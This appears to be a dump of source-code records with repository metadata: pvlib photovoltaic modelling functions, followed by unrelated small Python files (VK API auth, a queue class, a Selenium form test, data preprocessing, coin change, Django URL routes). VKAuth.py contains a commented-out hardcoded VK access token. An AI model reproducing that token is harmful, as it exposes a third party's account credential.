The diffuse irradiance incident on module. [W/m2]
airmass_absolute : numeric
Absolute airmass. [unitless]
aoi : numeric
Angle of incidence. [degrees]
module : dict-like
A dict, Series, or DataFrame defining the SAPM performance
parameters. See the :py:func:`sapm` notes section for more
details.
Returns
-------
effective_irradiance : numeric
Effective irradiance accounting for reflections and spectral content.
[W/m2]
Notes
-----
The SAPM model for effective irradiance [1]_ translates broadband direct
and diffuse irradiance on the plane of array to the irradiance absorbed by
a module's cells.
The model is
.. math::
`Ee = f_1(AM_a) (E_b f_2(AOI) + f_d E_d)`
where :math:`Ee` is effective irradiance (W/m2), :math:`f_1` is a fourth
degree polynomial in air mass :math:`AM_a`, :math:`E_b` is beam (direct)
irradiance on the plane of array, :math:`E_d` is diffuse irradiance on the
plane of array, :math:`f_2` is a fifth degree polynomial in the angle of
incidence :math:`AOI`, and :math:`f_d` is the fraction of diffuse
irradiance on the plane of array that is not reflected away.
References
----------
.. [1] D. King et al, "Sandia Photovoltaic Array Performance Model",
SAND2004-3535, Sandia National Laboratories, Albuquerque, NM
See also
--------
pvlib.iam.sapm
pvlib.pvsystem.sapm_spectral_loss
pvlib.pvsystem.sapm
"""
F1 = sapm_spectral_loss(airmass_absolute, module)
F2 = iam.sapm(aoi, module)
Ee = F1 * (poa_direct * F2 + module['FD'] * poa_diffuse)
return Ee
def singlediode(photocurrent, saturation_current, resistance_series,
resistance_shunt, nNsVth, ivcurve_pnts=None,
method='lambertw'):
r"""
Solve the single-diode equation to obtain a photovoltaic IV curve.
Solves the single diode equation [1]_
.. math::
I = I_L -
I_0 \left[
\exp \left(\frac{V+I R_s}{n N_s V_{th}} \right)-1
\right] -
\frac{V + I R_s}{R_{sh}}
for :math:`I` and :math:`V` when given :math:`I_L, I_0, R_s, R_{sh},` and
:math:`n N_s V_{th}` which are described later. Returns a DataFrame
which contains the 5 points on the I-V curve specified in
[3]_. If all :math:`I_L, I_0, R_s, R_{sh},` and
:math:`n N_s V_{th}` are scalar, a single curve is returned, if any
are Series (of the same length), multiple IV curves are calculated.
The input parameters can be calculated from meteorological data using a
function for a single diode model, e.g.,
:py:func:`~pvlib.pvsystem.calcparams_desoto`.
Parameters
----------
photocurrent : numeric
Light-generated current :math:`I_L` (photocurrent)
``0 <= photocurrent``. [A]
saturation_current : numeric
Diode saturation :math:`I_0` current under desired IV curve
conditions. ``0 < saturation_current``. [A]
resistance_series : numeric
Series resistance :math:`R_s` under desired IV curve conditions.
``0 <= resistance_series < numpy.inf``. [ohm]
resistance_shunt : numeric
Shunt resistance :math:`R_{sh}` under desired IV curve conditions.
``0 < resistance_shunt <= numpy.inf``. [ohm]
nNsVth : numeric
The product of three components: 1) the usual diode ideality factor
:math:`n`, 2) the number of cells in series :math:`N_s`, and 3)
the cell thermal voltage
:math:`V_{th}`. The thermal voltage of the cell (in volts) may be
calculated as :math:`k_B T_c / q`, where :math:`k_B` is
Boltzmann's constant (J/K), :math:`T_c` is the temperature of the p-n
junction in Kelvin, and :math:`q` is the charge of an electron
(coulombs). ``0 < nNsVth``. [V]
ivcurve_pnts : None or int, default None
Number of points in the desired IV curve. If None or 0, no points on
the IV curves will be produced.
method : str, default 'lambertw'
Determines the method used to calculate points on the IV curve. The
options are ``'lambertw'``, ``'newton'``, or ``'brentq'``.
Returns
-------
OrderedDict or DataFrame
The returned dict-like object always contains the keys/columns:
* i_sc - short circuit current in amperes.
* v_oc - open circuit voltage in volts.
* i_mp - current at maximum power point in amperes.
* v_mp - voltage at maximum power point in volts.
* p_mp - power at maximum power point in watts.
* i_x - current, in amperes, at ``v = 0.5*v_oc``.
* i_xx - current, in amperes, at ``V = 0.5*(v_oc+v_mp)``.
If ivcurve_pnts is greater than 0, the output dictionary will also
include the keys:
* i - IV curve current in amperes.
* v - IV curve voltage in volts.
The output will be an OrderedDict if photocurrent is a scalar,
array, or ivcurve_pnts is not None.
The output will be a DataFrame if photocurrent is a Series and
ivcurve_pnts is None.
See also
--------
calcparams_desoto
calcparams_cec
calcparams_pvsyst
sapm
pvlib.singlediode.bishop88
Notes
-----
If the method is ``'lambertw'`` then the solution employed to solve the
implicit diode equation utilizes the Lambert W function to obtain an
explicit function of :math:`V=f(I)` and :math:`I=f(V)` as shown in [2]_.
If the method is ``'newton'`` then the root-finding Newton-Raphson method
is used. It should be safe for well behaved IV-curves, but the ``'brentq'``
method is recommended for reliability.
If the method is ``'brentq'`` then Brent's bisection search method is used
that guarantees convergence by bounding the voltage between zero and
open-circuit.
If the method is either ``'newton'`` or ``'brentq'`` and ``ivcurve_pnts``
are indicated, then :func:`pvlib.singlediode.bishop88` [4]_ is used to
calculate the points on the IV curve points at diode voltages from zero to
open-circuit voltage with a log spacing that gets closer as voltage
increases. If the method is ``'lambertw'`` then the calculated points on
the IV curve are linearly spaced.
References
----------
.. [1] S.R. Wenham, M.A. Green, M.E. Watt, "Applied Photovoltaics" ISBN
0 86758 909 4
.. [2] A. Jain, A. Kapoor, "Exact analytical solutions of the
parameters of real solar cells using Lambert W-function", Solar
Energy Materials and Solar Cells, 81 (2004) 269-277.
.. [3] D. King et al, "Sandia Photovoltaic Array Performance Model",
SAND2004-3535, Sandia National Laboratories, Albuquerque, NM
.. [4] "Computer simulation of the effects of electrical mismatches in
photovoltaic cell interconnection circuits" JW Bishop, Solar Cell (1988)
https://doi.org/10.1016/0379-6787(88)90059-2
"""
# Calculate points on the IV curve using the LambertW solution to the
# single diode equation
if method.lower() == 'lambertw':
out = _singlediode._lambertw(
photocurrent, saturation_current, resistance_series,
resistance_shunt, nNsVth, ivcurve_pnts
)
i_sc, v_oc, i_mp, v_mp, p_mp, i_x, i_xx = out[:7]
if ivcurve_pnts:
ivcurve_i, ivcurve_v = out[7:]
else:
# Calculate points on the IV curve using either 'newton' or 'brentq'
# methods. Voltages are determined by first solving the single diode
# equation for the diode voltage V_d then backing out voltage
args = (photocurrent, saturation_current, resistance_series,
resistance_shunt, nNsVth) # collect args
v_oc = _singlediode.bishop88_v_from_i(
0.0, *args, method=method.lower()
)
i_mp, v_mp, p_mp = _singlediode.bishop88_mpp(
*args, method=method.lower()
)
i_sc = _singlediode.bishop88_i_from_v(
0.0, *args, method=method.lower()
)
i_x = _singlediode.bishop88_i_from_v(
v_oc / 2.0, *args, method=method.lower()
)
i_xx = _singlediode.bishop88_i_from_v(
(v_oc + v_mp) / 2.0, *args, method=method.lower()
)
# calculate the IV curve if requested using bishop88
if ivcurve_pnts:
vd = v_oc * (
(11.0 - np.logspace(np.log10(11.0), 0.0, ivcurve_pnts)) / 10.0
)
ivcurve_i, ivcurve_v, _ = _singlediode.bishop88(vd, *args)
out = OrderedDict()
out['i_sc'] = i_sc
out['v_oc'] = v_oc
out['i_mp'] = i_mp
out['v_mp'] = v_mp
out['p_mp'] = p_mp
out['i_x'] = i_x
out['i_xx'] = i_xx
if ivcurve_pnts:
out['v'] = ivcurve_v
out['i'] = ivcurve_i
if isinstance(photocurrent, pd.Series) and not ivcurve_pnts:
out = pd.DataFrame(out, index=photocurrent.index)
return out
def max_power_point(photocurrent, saturation_current, resistance_series,
resistance_shunt, nNsVth, d2mutau=0, NsVbi=np.Inf,
method='brentq'):
"""
Given the single diode equation coefficients, calculates the maximum power
point (MPP).
Parameters
----------
photocurrent : numeric
photo-generated current [A]
saturation_current : numeric
diode reverse saturation current [A]
resistance_series : numeric
series resitance [ohms]
resistance_shunt : numeric
shunt resitance [ohms]
nNsVth : numeric
product of thermal voltage ``Vth`` [V], diode ideality factor ``n``,
and number of serices cells ``Ns``
d2mutau : numeric, default 0
PVsyst parameter for cadmium-telluride (CdTe) and amorphous-silicon
(a-Si) modules that accounts for recombination current in the
intrinsic layer. The value is the ratio of intrinsic layer thickness
squared :math:`d^2` to the diffusion length of charge carriers
:math:`\\mu \\tau`. [V]
NsVbi : numeric, default np.inf
PVsyst parameter for cadmium-telluride (CdTe) and amorphous-silicon
(a-Si) modules that is the product of the PV module number of series
cells ``Ns`` and the builtin voltage ``Vbi`` of the intrinsic layer.
[V].
method : str
either ``'newton'`` or ``'brentq'``
Returns
-------
OrderedDict or pandas.Datafrane
``(i_mp, v_mp, p_mp)``
Notes
-----
Use this function when you only want to find the maximum power point. Use
:func:`singlediode` when you need to find additional points on the IV
curve. This function uses Brent's method by default because it is
guaranteed to converge.
"""
i_mp, v_mp, p_mp = _singlediode.bishop88_mpp(
photocurrent, saturation_current, resistance_series,
resistance_shunt, nNsVth, d2mutau=0, NsVbi=np.Inf,
method=method.lower()
)
if isinstance(photocurrent, pd.Series):
ivp = {'i_mp': i_mp, 'v_mp': v_mp, 'p_mp': p_mp}
out = pd.DataFrame(ivp, index=photocurrent.index)
else:
out = OrderedDict()
out['i_mp'] = i_mp
out['v_mp'] = v_mp
out['p_mp'] = p_mp
return out
def v_from_i(resistance_shunt, resistance_series, nNsVth, current,
saturation_current, photocurrent, method='lambertw'):
'''
Device voltage at the given device current for the single diode model.
Uses the single diode model (SDM) as described in, e.g.,
Jain and Kapoor 2004 [1]_.
The solution is per Eq 3 of [1]_ except when resistance_shunt=numpy.inf,
in which case the explict solution for voltage is used.
Ideal device parameters are specified by resistance_shunt=np.inf and
resistance_series=0.
Inputs to this function can include scalars and pandas.Series, but it is
the caller's responsibility to ensure that the arguments are all float64
and within the proper ranges.
Parameters
----------
resistance_shunt : numeric
Shunt resistance in ohms under desired IV curve conditions.
Often abbreviated ``Rsh``.
0 < resistance_shunt <= numpy.inf
resistance_series : numeric
Series resistance in ohms under desired IV curve conditions.
Often abbreviated ``Rs``.
0 <= resistance_series < numpy.inf
nNsVth : numeric
The product of three components. 1) The usual diode ideal factor
(n), 2) the number of cells in series (Ns), and 3) the cell
thermal voltage under the desired IV curve conditions (Vth). The
thermal voltage of the cell (in volts) may be calculated as
``k*temp_cell/q``, where k is Boltzmann's constant (J/K),
temp_cell is the temperature of the p-n junction in Kelvin, and
q is the charge of an electron (coulombs).
0 < nNsVth
current : numeric
The current in amperes under desired IV curve conditions.
saturation_current : numeric
Diode saturation current in amperes under desired IV curve
conditions. Often abbreviated ``I_0``.
0 < saturation_current
photocurrent : numeric
Light-generated current (photocurrent) in amperes under desired
IV curve conditions. Often abbreviated ``I_L``.
0 <= photocurrent
method : str
Method to use: ``'lambertw'``, ``'newton'``, or ``'brentq'``. *Note*:
``'brentq'`` is limited to 1st quadrant only.
Returns
-------
current : np.ndarray or scalar
References
----------
.. [1] A. Jain, A. Kapoor, "Exact analytical solutions of the
parameters of real solar cells using Lambert W-function", Solar
Energy Materials and Solar Cells, 81 (2004) 269-277.
'''
if method.lower() == 'lambertw':
return _singlediode._lambertw_v_from_i(
resistance_shunt, resistance_series, nNsVth, current,
saturation_current, photocurrent
)
else:
# Calculate points on the IV curve using either 'newton' or 'brentq'
# methods. Voltages are determined by first solving the single diode
# equation for the diode voltage V_d then backing out voltage
args = (current, photocurrent, saturation_current,
resistance_series, resistance_shunt, nNsVth)
V = _singlediode.bishop88_v_from_i(*args, method=method.lower())
# find the right size and shape for returns
size, shape = _singlediode._get_size_and_shape(args)
if size <= 1:
if shape is not None:
V = np.tile(V, shape)
if np.isnan(V).any() and size <= 1:
V = np.repeat(V, size)
if shape is not None:
V = V.reshape(shape)
return V
def i_from_v(resistance_shunt, resistance_series, nNsVth, voltage,
saturation_current, photocurrent, method='lambertw'):
'''
Device current at the given device voltage for the single diode model.
Uses the single diode model (SDM) as described in, e.g.,
Jain and Kapoor 2004 [1]_.
The solution is per Eq 2 of [1] except when resistance_series=0,
in which case the explict solution for current is used.
Ideal device parameters are specified by resistance_shunt=np.inf and
resistance_series=0.
Inputs to this function can include scalars and pandas.Series, but it is
the caller's responsibility to ensure that the arguments are all float64
and within the proper ranges.
Parameters
----------
resistance_shunt : numeric
Shunt resistance in ohms under desired IV curve conditions.
Often abbreviated ``Rsh``.
0 < resistance_shunt <= numpy.inf
resistance_series : numeric
Series resistance in ohms under desired IV curve conditions.
Often abbreviated ``Rs``.
0 <= resistance_series < numpy.inf
nNsVth : numeric
The product of three components. 1) The usual diode ideal factor
(n), 2) the number of cells in series (Ns), and 3) the cell
thermal voltage under the desired IV curve conditions (Vth). The
thermal voltage of the cell (in volts) may be calculated as
``k*temp_cell/q``, where k is Boltzmann's constant (J/K),
temp_cell is the temperature of the p-n junction in Kelvin, and
q is the charge of an electron (coulombs).
0 < nNsVth
voltage : numeric
The voltage in Volts under desired IV curve conditions.
saturation_current : numeric
Diode saturation current in amperes under desired IV curve
conditions. Often abbreviated ``I_0``.
0 < saturation_current
photocurrent : numeric
Light-generated current (photocurrent) in amperes under desired
IV curve conditions. Often abbreviated ``I_L``.
0 <= photocurrent
method : str
Method to use: ``'lambertw'``, ``'newton'``, or ``'brentq'``. *Note*:
``'brentq'`` is limited to 1st quadrant only.
Returns
-------
current : np.ndarray or scalar
References
----------
.. [1] A. Jain, A. Kapoor, "Exact analytical solutions of the
parameters of real solar cells using Lambert W-function", Solar
Energy Materials and Solar Cells, 81 (2004) 269-277.
'''
if method.lower() == 'lambertw':
return _singlediode._lambertw_i_from_v(
resistance_shunt, resistance_series, nNsVth, voltage,
saturation_current, photocurrent
)
else:
# Calculate points on the IV curve using either 'newton' or 'brentq'
# methods. Voltages are determined by first solving the single diode
# equation for the diode voltage V_d then backing out voltage
args = (voltage, photocurrent, saturation_current, resistance_series,
resistance_shunt, nNsVth)
current = _singlediode.bishop88_i_from_v(*args, method=method.lower())
# find the right size and shape for returns
size, shape = _singlediode._get_size_and_shape(args)
if size <= 1:
if shape is not None:
current = np.tile(current, shape)
if np.isnan(current).any() and size <= 1:
current = np.repeat(current, size)
if shape is not None:
current = current.reshape(shape)
return current
def scale_voltage_current_power(data, voltage=1, current=1):
"""
Scales the voltage, current, and power of the DataFrames
returned by :py:func:`singlediode` and :py:func:`sapm`.
Parameters
----------
data: DataFrame
Must contain columns `'v_mp', 'v_oc', 'i_mp' ,'i_x', 'i_xx',
'i_sc', 'p_mp'`.
voltage: numeric, default 1
The amount by which to multiply the voltages.
current: numeric, default 1
The amount by which to multiply the currents.
Returns
-------
scaled_data: DataFrame
A scaled copy of the input data.
`'p_mp'` is scaled by `voltage * current`.
"""
# as written, only works with a DataFrame
# could make it work with a dict, but it would be more verbose
data = data.copy()
voltages = ['v_mp', 'v_oc']
currents = ['i_mp', 'i_x', 'i_xx', 'i_sc']
data[voltages] *= voltage
data[currents] *= current
data['p_mp'] *= voltage * current
return data
def pvwatts_dc(g_poa_effective, temp_cell, pdc0, gamma_pdc, temp_ref=25.):
r"""
Implements NREL's PVWatts DC power model. The PVWatts DC model [1]_ is:
.. math::
P_{dc} = \frac{G_{poa eff}}{1000} P_{dc0} ( 1 + \gamma_{pdc} (T_{cell} - T_{ref}))
Note that the pdc0 is also used as a symbol in
:py:func:`pvlib.inverter.pvwatts`. pdc0 in this function refers to the DC
power of the modules at reference conditions. pdc0 in
:py:func:`pvlib.inverter.pvwatts` refers to the DC power input limit of
the inverter.
Parameters
----------
g_poa_effective: numeric
Irradiance transmitted to the PV cells in units of W/m**2. To be
fully consistent with PVWatts, the user must have already
applied angle of incidence losses, but not soiling, spectral,
etc.
temp_cell: numeric
Cell temperature in degrees C.
pdc0: numeric
Power of the modules at 1000 W/m2 and cell reference temperature.
gamma_pdc: numeric
The temperature coefficient in units of 1/C. Typically -0.002 to
-0.005 per degree C.
temp_ref: numeric, default 25.0
Cell reference temperature. PVWatts defines it to be 25 C and
is included here for flexibility.
Returns
-------
pdc: numeric
DC power.
References
----------
.. [1] A. P. Dobos, "PVWatts Version 5 Manual"
http://pvwatts.nrel.gov/downloads/pvwattsv5.pdf
(2014).
""" # noqa: E501
pdc = (g_poa_effective * 0.001 * pdc0 *
(1 + gamma_pdc * (temp_cell - temp_ref)))
return pdc
def pvwatts_losses(soiling=2, shading=3, snow=0, mismatch=2, wiring=2,
connections=0.5, lid=1.5, nameplate_rating=1, age=0,
availability=3):
r"""
Implements NREL's PVWatts system loss model.
The PVWatts loss model [1]_ is:
.. math::
L_{total}(\%) = 100 [ 1 - \Pi_i ( 1 - \frac{L_i}{100} ) ]
All parameters must be in units of %. Parameters may be
array-like, though all array sizes must match.
Parameters
----------
soiling: numeric, default 2
shading: numeric, default 3
snow: numeric, default 0
mismatch: numeric, default 2
wiring: numeric, default 2
connections: numeric, default 0.5
lid: numeric, default 1.5
Light induced degradation
nameplate_rating: numeric, default 1
age: numeric, default 0
availability: numeric, default 3
Returns
-------
losses: numeric
System losses in units of %.
References
----------
.. [1] A. P. Dobos, "PVWatts Version 5 Manual"
http://pvwatts.nrel.gov/downloads/pvwattsv5.pdf
(2014).
"""
params = [soiling, shading, snow, mismatch, wiring, connections, lid,
nameplate_rating, age, availability]
# manually looping over params allows for numpy/pandas to handle any
# array-like broadcasting that might be necessary.
perf = 1
for param in params:
perf *= 1 - param/100
losses = (1 - perf) * 100.
return losses
def combine_loss_factors(index, *losses, fill_method='ffill'):
r"""
Combines Series loss fractions while setting a common index.
The separate losses are compounded using the following equation:
.. math::
L_{total} = 1 - [ 1 - \Pi_i ( 1 - L_i ) ]
:math:`L_{total}` is the total loss returned
:math:`L_i` is each individual loss factor input
Note the losses must each be a series with a DatetimeIndex.
All losses will be resampled to match the index parameter using
the fill method specified (defaults to "fill forward").
Parameters
----------
index : DatetimeIndex
The index of the returned loss factors
*losses : Series
One or more Series of fractions to be compounded
fill_method : {'ffill', 'bfill', 'nearest'}, default 'ffill'
Method to use for filling holes in reindexed DataFrame
Returns
-------
Series
Fractions resulting from the combination of each loss factor
"""
combined_factor = 1
for loss in losses:
loss = loss.reindex(index, method=fill_method)
combined_factor *= (1 - loss)
return 1 - combined_factor
snlinverter = deprecated('0.8', alternative='inverter.sandia',
name='snlinverter', removal='0.9')(inverter.sandia)
adrinverter = deprecated('0.8', alternative='inverter.adr', name='adrinverter',
removal='0.9')(inverter.adr)
pvwatts_ac = deprecated('0.8', alternative='inverter.pvwatts',
name='pvwatts_ac', removal='0.9')(inverter.pvwatts)
|
[
"michal.makson@gmail.com"
] |
michal.makson@gmail.com
|
a3b8b46b4b69ec5c3b46327d35360b5edb9e3ffd
|
62097bc035fed6ea64d9fb8ff6e6d58795c57ec7
|
/src/auth/VKAuth.py
|
b6cb4b93f7e117a1556d9bb3afdbf90dfd0abd56
|
[] |
no_license
|
BeTripTeam/People-Analytics
|
4791135f21bb85771915488cc960e9f8392ac9aa
|
2c8d45aa33b213e2c8b03563ba28adf801287812
|
refs/heads/master
| 2020-03-19T03:15:21.046661
| 2018-06-01T13:28:14
| 2018-06-01T13:28:14
| 135,710,198
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 717
|
py
|
import vk
from src.exceptions.VKException import VKException
from src.models.API.API import API
from .Auth import Auth
class VKAuth(Auth):
#access_token = '87cc1a32e7af1bb84adefc1e0f01570f6d08930c538a486b9d888cd0ff1910302c827e20284647e18cc61'
_api = None
def __init__(self, access_token):
self.access_token = access_token
self.get_api()
def get_api(self) -> API:
if self._api is None:
try:
session = vk.Session(access_token=self.access_token)
vk_api = vk.API(session, v='5.73')
self._api = API(vk_api)
except Exception as e:
raise VKException(e)
return self._api
|
[
"marikoreneva@gmail.com"
] |
marikoreneva@gmail.com
|
8f6336395a7599af5c616dc9ee4a969eb7482bc5
|
cabe3a25370bb72873b5809f1bb80ede77364599
|
/python-playground/datastructures/queues/list_queue.py
|
25206bca14d231485d515fb98fa7b3342b815564
|
[] |
no_license
|
therachelbentley/algorithms
|
2ae69ab1ca8465b9a04194e23f6ebdbf529866d0
|
977fd4cb2a54bfda54fb9d47a3dcde42c41610f5
|
refs/heads/master
| 2023-05-26T10:07:09.036451
| 2020-05-10T17:29:50
| 2020-05-10T17:29:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 249
|
py
|
class ListQueue(object):
def __init__(self):
self.queue = []
def enqueue(self, data):
self.queue.insert(0, data)
def dequeue(self):
return self.queue.pop()
def size(self):
return len(self.queue)
|
[
"racheljohnson457@gmail.com"
] |
racheljohnson457@gmail.com
|
0a6f6613ff3d2c925ed735b41fffa3feb7223515
|
8c7fed8a53524014d703070fbd2aa2ba44e02d1b
|
/lesson1.6_step8.py
|
8e9cfeb9d937a39a52068feb9d990dd345232408
|
[] |
no_license
|
Pahab91/stepik-auto-tests-course
|
f1aff22c48c38326b02f909719be8bf23d2d1ce2
|
17440048266a4b357baa1eeb4fafcf040300ee71
|
refs/heads/main
| 2023-03-07T01:57:28.909166
| 2021-02-20T01:33:49
| 2021-02-20T01:33:49
| 340,496,690
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,635
|
py
|
from selenium import webdriver
import time
try:
link = "http://suninjuly.github.io/registration1.html"
browser = webdriver.Chrome()
browser.get(link)
input1 = browser.find_element_by_css_selector(".first_block .form-group.first_class input")
input1.send_keys("Frodo")
input2 = browser.find_element_by_css_selector(".first_block .form-group.second_class input")
input2.send_keys("Baggins")
input3 = browser.find_element_by_css_selector(".first_block .form-group.third_class input")
input3.send_keys("Shire@gmail.com")
# Отправляем заполненную форму
button = browser.find_element_by_css_selector("button.btn")
button.click()
# Проверяем, что смогли зарегистрироваться
# ждем загрузки страницы
time.sleep(1)
# находим элемент, содержащий текст
welcome_text_elt = browser.find_element_by_tag_name("h1")
# записываем в переменную welcome_text текст из элемента welcome_text_elt
welcome_text = welcome_text_elt.text
# с помощью assert проверяем, что ожидаемый текст совпадает с текстом на странице сайта
assert "Congratulations! You have successfully registered!" == welcome_text
finally:
# ожидание чтобы визуально оценить результаты прохождения скрипта
time.sleep(10)
# закрываем браузер после всех манипуляций
browser.quit()
|
[
"Pahab91@gmail.com"
] |
Pahab91@gmail.com
|
d6682fdff9794853d254ffcae829dc761088a489
|
8eaab995c998e904e9748e60d667fff2c540641a
|
/addition/makevocab.py
|
f7b50fc5f14f5adda981b9a820b7034caa8c0a67
|
[] |
no_license
|
araki214/Script_for_master
|
9b14088eb739fd2cc270fffcd7ea0ac54d667196
|
faa910b0ffa98559bbaac3de7b925597036aca43
|
refs/heads/master
| 2023-03-01T15:27:13.101330
| 2021-02-09T19:36:51
| 2021-02-09T19:36:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 444
|
py
|
import sys
vocab={}
databefore=sys.argv[1]
dataafter=sys.argv[2]
maximum=64000
with open(databefore,'r') as f:
for line in f:
line=line.split()
for i in line:
vocab[i]=vocab.get(i,0)+1
count=0
with open(dataafter,'w') as g:
g.write("[PAD]\n")
g.write("[UNK]\n")
g.write("[CLS]\n")
g.write("[SEP]\n")
g.write("[MASK]\n")
for voc,v in sorted(vocab.items(),key=lambda x:-x[1]):
if count <maximum:
g.write(voc+'\n')
count+=1
|
[
"xakari2000@yahoo.co.jp"
] |
xakari2000@yahoo.co.jp
|
577797b5cdeb4682623d63ae93e5352f0efc77d5
|
64ca4584e459bc1890853f824d48b2a5fbb09632
|
/IMDB/IMDB.py
|
493dcdc7b7f4d4fcaf555e97fac2c7d62b1f4ac2
|
[] |
no_license
|
Gozzah/Python
|
24a4d8e20c68362cd220c8bdaf4fc835d9fc3c02
|
fecab54a116c956409fd47f3faac7d1483fb8dda
|
refs/heads/master
| 2021-04-27T20:40:09.241636
| 2018-04-25T13:35:23
| 2018-04-25T13:35:23
| 122,384,268
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 895
|
py
|
import pandas as pd
content = pd.read_csv('https://datasets.imdbws.com/title.basics.tsv.gz', sep='\t', header=0)
df = content[content['titleType'] == 'movie']
most_movies = df['startYear'].value_counts()
print(most_movies)
#2. Which year was most series ended?
dfSeries = content[content['titleType'] == 'tvseries']
most_series = dfSeries['endYear'].value_counts()
print('the year where most series ended was: ', most_series)
#3. Which genres has the longest runtime per movies?
#4. Which genre covers the most movies?
titles = content[content['titleType'] == 'movie']
genre = titles['genres'].max()
print('genre with most movies is: ', genre)
#5. What is the average runtime on adult films?
genres = content[content['genres'] == 'adult']
average = genres['runtimeMinutes'].mean()
print('average runtime on adultfilms', average)
|
[
"noreply@github.com"
] |
Gozzah.noreply@github.com
|
a691834806912611ff6db8d6b038048e8daf5cdb
|
d1b80aa1bb58313bf851ac51873ff5ddef85368e
|
/oop3.py
|
f2ff8c8a5cc417ebbf8d73057629a5ec3ea34f27
|
[] |
no_license
|
KojoAning/PYHTON_PRACTICE
|
1680ac06e09a8c34c36a89fdcec9507adbe97c6e
|
397ce7feb61a857b90989243a7f78591a58f8ca0
|
refs/heads/master
| 2023-02-27T04:44:47.459776
| 2021-01-31T18:23:44
| 2021-01-31T18:23:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 651
|
py
|
class Employee():
no_of_leave= 8
def __init__(self,aname , asaalary, arole): # init func. don't requires no calling
self.name = aname
self.salary = asaalary
self.role = arole
def printditails(self):
return f"name is {self.rohan} and salary is {self.salary} and role is {self.role}"
pass
harry = Employee('harry', 40384 ,'instructur')
rohan = Employee('rohan',10338,'student')# construtor
# rohan = Employee()
#
# harry.name = 'harry'
# harry.salary = 40384
# harry.role='instrucure'
#
# rohan.name ="Rohan"
# rohan.salary = 45555
# rohan.role = "Student"
print ( harry.salary)
print(rohan.role)
|
[
"srinathshrestha9890@gmail.com"
] |
srinathshrestha9890@gmail.com
|
2cdbc070027cc4df0fe09f2577e29effb7d73d7c
|
a5bfd76ec633a49bc20669aa77ce773f97430151
|
/BLE_preprocessing_3.py
|
4db5a7e5ae8e38e848d4375fe865cf4b60369e46
|
[
"MIT"
] |
permissive
|
alhomayani/Oversampling_BLE_fingerprints
|
8d6f3c2c774c9139ef84a7f4c1559be626e71ea8
|
080ec37072dfa44f73ced3f202e16fa0007bacba
|
refs/heads/main
| 2023-07-05T02:44:20.222386
| 2021-08-30T01:28:26
| 2021-08-30T01:28:26
| 375,171,546
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 531
|
py
|
import pandas as pd
import os
result = pd.DataFrame()
os.chdir('C:/Users/uf11/Desktop/BLE_dataset/preprocessing/preprocessing_2')
for phone in range(1):
for slot in range(6):
df_temp = pd.read_csv('phone_'+str(phone+3)+'_slot_'+str(slot+1)+'_scaled.csv', index_col=[0])
print(len(df_temp))
result = result.append(df_temp, ignore_index=True)
os.chdir('C:/Users/uf11/Desktop/BLE_dataset/preprocessing/preprocessing_3')
result.to_csv('data_3.csv', index=False)
print(len(result))
|
[
"noreply@github.com"
] |
alhomayani.noreply@github.com
|
08b479d74c044be6254dfbac91e991e192c4ed1b
|
75a2ad10d18aea735eaf3e859eb3988d94e9c36a
|
/CodeUp/기초 100제/6090_종합.py
|
3c59df0144218df4100f715ba24348f87e32ab8c
|
[] |
no_license
|
sbtiffanykim/problem-solving
|
d2679b0405f9c2397d7af780721066bfbd812e32
|
10a6ec90d29c9126f56c9be2ee696ce30ca30bd5
|
refs/heads/master
| 2023-04-25T18:26:56.511663
| 2021-06-10T12:30:13
| 2021-06-10T12:30:13
| 360,552,625
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 127
|
py
|
"""
#6090: 수 나열하기 3
"""
a, m, d, n = map(int, input().split())
for i in range(1, n):
a = a * (m) + d
print(a)
|
[
"sbtiffanykim@gmail.com"
] |
sbtiffanykim@gmail.com
|
5cdf1cb88588211b536518f30fdbc77cc70d5712
|
07123806119496981cccf1ca577de7ddc7b59146
|
/COP4531/coinchangemin.py
|
f3e997a09c3bd30c81ee96f542c5205ff6e5fc7e
|
[] |
no_license
|
wcwagner/Algorithms
|
02482be2d5eab79cbc12ae3f78acb16883139ab0
|
10fcae69231f873d68e92b54035ca7fa6a20a359
|
refs/heads/master
| 2020-05-22T01:21:57.168199
| 2016-12-10T21:24:50
| 2016-12-10T21:24:50
| 60,459,776
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 615
|
py
|
def coin_change_min(N, S):
"""
Minimum amount of coins needed to make N
"""
# dp[i] is minimum coins needed to make amount i
dp = [0] * (N + 1)
for curr_amt in range(1, N+1):
min_val = float("inf")
for coin_val in S:
if curr_amt >= coin_val:
num_ways = 1 + dp[curr_amt - coin_val]
min_val = min(min_val, num_ways)
dp[curr_amt] = min_val
return dp[N]
if __name__ == "__main__":
S = [1,7, 10]
N = 14
print(coin_change_min(N, S))
S = [1, 5, 10, 25]
N = 98
print(coin_change_min(N, S))
|
[
"wcw13@my.fsu.edu"
] |
wcw13@my.fsu.edu
|
837e94badfe7f215ca75ba23dc83e7f45993c8ef
|
8803bbced7e91c80d29753a3d1cb3bb478a13961
|
/app/session/urls.py
|
8d7877d2b5cb0f3353eb2f8a8f10854e058becf6
|
[] |
no_license
|
jiggum/CS496_Project3
|
e8981ef59f7bf7be20431f175df7fc8c2f44833e
|
afef8670cfca1d87a960cddd57a127b263d4bab0
|
refs/heads/master
| 2021-01-21T02:01:53.898184
| 2016-07-14T01:58:15
| 2016-07-14T01:58:15
| 63,216,265
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
"""null URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include,url
import app.session.views
urlpatterns = [
url(r'^login/$', app.session.views.login_view),
url(r'^logout/$', app.session.views.user_logout),
url(r'^register/$', app.session.views.register_view),
